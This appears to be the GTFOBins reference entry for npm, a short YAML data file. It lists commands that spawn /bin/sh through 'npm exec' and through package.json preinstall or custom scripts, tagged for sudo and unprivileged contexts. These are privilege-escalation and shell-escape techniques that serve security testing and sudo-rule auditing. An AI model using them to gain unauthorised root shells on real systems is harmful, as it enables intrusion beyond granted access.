1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/npm
2026-01-09 19:20:30 +01:00

22 lines
393 B
Plaintext

---
functions:
shell:
- code: |-
npm exec /bin/sh
contexts:
sudo:
unprivileged:
- code: |-
echo '{"scripts": {"preinstall": "/bin/sh"}}' >package.json
npm -C . i
contexts:
sudo:
unprivileged:
- code: |-
echo '{"scripts": {"xxx": "/bin/sh"}}' >package.json
npm -C . run xxx
contexts:
sudo:
unprivileged:
...